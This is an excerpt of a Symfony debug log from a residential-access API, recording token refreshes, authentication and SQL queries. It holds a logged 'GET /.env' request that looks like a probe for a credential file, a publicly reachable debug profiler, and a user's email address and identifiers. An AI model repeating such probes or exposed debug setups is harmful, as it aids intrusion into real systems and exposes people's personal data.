  2914. [2025-12-18 00:14:56] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2915. [2025-12-18 00:14:56] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2916. [2025-12-18 00:14:56] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2917. [2025-12-18 00:14:56] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  2918. [2025-12-18 00:14:56] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  2919. [2025-12-18 00:14:56] security.DEBUG: Calling Authentication entry point. [] []
  2920. [2025-12-18 00:16:00] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0409e5","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/0409e5/search/results?ip=216.106.187.123&limit=10","method":"GET"} []
  2921. [2025-12-18 00:16:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10","method":"GET"} []
  2922. [2025-12-18 00:19:06] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  2923. [2025-12-18 00:19:06] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  2924. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["db188d1484388f19ab3d333397 [...]"] []
  2925. [2025-12-18 00:19:06] doctrine.DEBUG: "START TRANSACTION" [] []
  2926. [2025-12-18 00:19:06] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"85f7a45a7f902076a7dd71f507 [...]","3":"2025-12-18 00:49:06","4":"","5":375,"6":"[]"} []
  2927. [2025-12-18 00:19:06] doctrine.DEBUG: "COMMIT" [] []
  2928. [2025-12-18 00:19:06] doctrine.DEBUG: "START TRANSACTION" [] []
  2929. [2025-12-18 00:19:06] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"be6b1cddd474e5e6372d1ddea8 [...]","3":"2026-02-16 00:19:06","4":"","5":375,"6":"[]"} []
  2930. [2025-12-18 00:19:06] doctrine.DEBUG: "COMMIT" [] []
  2931. [2025-12-18 00:19:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  2932. [2025-12-18 00:19:06] doctrine.DEBUG: "START TRANSACTION" [] []
  2933. [2025-12-18 00:19:06] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"db188d1484388f19ab3d333397 [...]"] []
  2934. [2025-12-18 00:19:06] doctrine.DEBUG: "COMMIT" [] []
  2935. [2025-12-18 00:19:06] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/10/0?order=desc","method":"GET"} []
  2936. [2025-12-18 00:19:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2937. [2025-12-18 00:19:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2938. [2025-12-18 00:19:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2939. [2025-12-18 00:19:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2940. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  2941. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  2942. [2025-12-18 00:19:06] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2943. [2025-12-18 00:19:06] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2944. [2025-12-18 00:19:06] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2945. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  2946. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
  2947. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  2948. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  2949. [2025-12-18 00:19:06] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  2950. [2025-12-18 00:19:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2951. [2025-12-18 00:19:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2952. [2025-12-18 00:19:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2953. [2025-12-18 00:19:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2954. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [251,1] []
  2955. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
  2956. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  2957. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
  2958. [2025-12-18 00:19:06] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  2959. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  2960. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  2961. [2025-12-18 00:19:06] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  2962. [2025-12-18 00:19:06] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2963. [2025-12-18 00:19:06] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2964. [2025-12-18 00:19:06] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2965. [2025-12-18 00:19:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  2966. [2025-12-18 00:19:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2967. [2025-12-18 00:19:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2968. [2025-12-18 00:19:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2969. [2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
  2970. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
  2971. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  2972. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
  2973. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  2974. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  2975. [2025-12-18 00:19:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2976. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
  2977. [2025-12-18 00:19:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2978. [2025-12-18 00:19:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  2979. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
  2980. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["E9690C4C-7479-437B-82D6-F9 [...]",1,375] []
  2981. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
  2982. [2025-12-18 00:19:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  2983. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
  2984. [2025-12-18 00:19:07] doctrine.DEBUG: "START TRANSACTION" [] []
  2985. [2025-12-18 00:19:07] doctrine.DEBUG: UPDATE device SET date_created = ?, date_modified = ?, os = ? WHERE id = ? ["2022-11-28 02:48:14","2025-12-18 00:19:07","26.2",566] []
  2986. [2025-12-18 00:19:07] doctrine.DEBUG: "COMMIT" [] []
  2987. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT d0_.id AS id_0, d0_.uuid AS uuid_1, d0_.status AS status_2, d0_.date_created AS date_created_3, d0_.date_modified AS date_modified_4, d0_.guid AS guid_5, d0_.endpoint_arn AS endpoint_arn_6, d0_.token AS token_7, d0_.identifier AS identifier_8, d0_.model AS model_9, d0_.os AS os_10, d0_.app_version AS app_version_11, d0_.arn_status AS arn_status_12, d0_.type AS type_13, d0_.app AS app_14, d0_.user_id AS user_id_15 FROM device d0_ WHERE (d0_.token = ?) AND (d0_.uuid <> ?) ["925b97ba1533870e655db98c25 [...]","4cf416c3-f8a2-4b97-aec0-5e [...]"] []
  2988. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.status = ? [375,1] []
  2989. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
  2990. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  2991. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
  2992. [2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.arn AS arn_7, t0.type AS type_8 FROM topic t0 WHERE t0.name = ? LIMIT 1 ["residential-7ff0f4e0-7d46- [...]"] []
  2993. [2025-12-18 00:19:07] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "Subscribe" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>e6fec324-ec87-5f44-b313-a299a63cf2e1</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"Subscribe\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>e6fec324-ec87-5f44-b313-a299a63cf2e1</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  2994. [2025-12-18 00:19:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  2995. [2025-12-18 00:19:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  2996. [2025-12-18 00:19:11] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/a725d03d-0217-4179-9082-5a05b0a9293e/providers","method":"GET"} []
  2997. [2025-12-18 00:19:11] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  2998. [2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
  2999. [2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
  3000. [2025-12-18 00:19:11] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  3001. [2025-12-18 00:19:11] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  3002. [2025-12-18 00:19:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  3003. [2025-12-18 00:19:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3004. [2025-12-18 00:19:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3005. [2025-12-18 00:19:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  3006. [2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
